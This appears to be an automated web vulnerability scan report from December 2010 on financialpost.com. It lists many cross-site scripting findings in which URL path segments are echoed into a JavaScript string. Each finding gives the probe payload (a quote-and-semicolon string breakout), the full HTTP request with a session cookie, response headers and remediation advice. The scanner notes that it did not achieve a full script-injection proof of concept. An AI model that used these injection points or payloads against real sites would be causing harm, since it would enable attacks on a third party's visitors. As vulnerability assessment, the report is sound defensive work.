<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion8ad4f';e55a38084cf/columnists/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion8ad4f';e55a38084cf;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=24013518?">
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a104'%3b5a547f5c299 was submitted in the REST URL parameter 2. This input was echoed as 3a104';5a547f5c299 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists3a104'%3b5a547f5c299/Retired+forgotten/3996666/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83730
Expires: Sun, 19 Dec 2010 03:14:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists3a104';5a547f5c299/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists3a104';5a547f5c299;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=14547920?">
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b60e8'%3bc423016c9ce was submitted in the REST URL parameter 4. This input was echoed as b60e8';c423016c9ce in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/Retired+forgotten/3996666b60e8'%3bc423016c9ce/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63851
Expires: Sun, 19 Dec 2010 03:14:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/retired-forgotten/3996666b60e8';c423016c9ce/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=retired-forgotten;kw=3996666b60e8';c423016c9ce;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=
...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85984'%3b9b5aa3d4cb2 was submitted in the REST URL parameter 5. This input was echoed as 85984';9b5aa3d4cb2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/Retired+forgotten/3996666/85984'%3b9b5aa3d4cb2 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37190
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9914'%3b305cc1577f was submitted in the REST URL parameter 1. This input was echoed as a9914';305cc1577f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opiniona9914'%3b305cc1577f/columnists/barry-critchley.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44289
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eacd7'%3bd88cefa4959 was submitted in the REST URL parameter 2. This input was echoed as eacd7';d88cefa4959 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnistseacd7'%3bd88cefa4959/barry-critchley.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37612
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29f40'%3b40381cfea5e was submitted in the REST URL parameter 3. This input was echoed as 29f40';40381cfea5e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/29f40'%3b40381cfea5e HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43401
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4697c'%3b898f841844e was submitted in the REST URL parameter 1. This input was echoed as 4697c';898f841844e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion4697c'%3b898f841844e/columnists/diane-francis.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d524b'%3be3824be34be was submitted in the REST URL parameter 2. This input was echoed as d524b';e3824be34be in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnistsd524b'%3be3824be34be/diane-francis.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43436
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c15cd'%3b24a7cbbec0f was submitted in the REST URL parameter 3. This input was echoed as c15cd';24a7cbbec0f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/c15cd'%3b24a7cbbec0f HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44221
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 204b9'%3bda5ddd2e310 was submitted in the REST URL parameter 1. This input was echoed as 204b9';da5ddd2e310 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion204b9'%3bda5ddd2e310/columnists/garry-marr.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43441
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6548'%3b3159e915d61 was submitted in the REST URL parameter 2. This input was echoed as f6548';3159e915d61 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnistsf6548'%3b3159e915d61/garry-marr.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37562
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc04b'%3bdce0ac574b1 was submitted in the REST URL parameter 3. This input was echoed as cc04b';dce0ac574b1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/cc04b'%3bdce0ac574b1 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43402
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88d2f'%3b0c9133db820 was submitted in the REST URL parameter 1. This input was echoed as 88d2f';0c9133db820 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion88d2f'%3b0c9133db820/columnists/jamie-golombek.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37637
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ed13'%3b43d2ce6bccf was submitted in the REST URL parameter 2. This input was echoed as 4ed13';43d2ce6bccf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists4ed13'%3b43d2ce6bccf/jamie-golombek.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37601
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b393c'%3b95d66bbad15 was submitted in the REST URL parameter 3. This input was echoed as b393c';95d66bbad15 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/b393c'%3b95d66bbad15 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44222
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8854'%3b3c5e10ffaf8 was submitted in the REST URL parameter 1. This input was echoed as a8854';3c5e10ffaf8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opiniona8854'%3b3c5e10ffaf8/columnists/jonathan-chevreau.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43512
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ca10'%3bd81b1ae580f was submitted in the REST URL parameter 2. This input was echoed as 1ca10';d81b1ae580f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists1ca10'%3bd81b1ae580f/jonathan-chevreau.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37632
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1e72'%3bc945c59c0e9 was submitted in the REST URL parameter 3. This input was echoed as f1e72';c945c59c0e9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/f1e72'%3bc945c59c0e9 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37558
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8d26'%3b3b9f28c8209 was submitted in the REST URL parameter 1. This input was echoed as c8d26';3b9f28c8209 in the application's response.
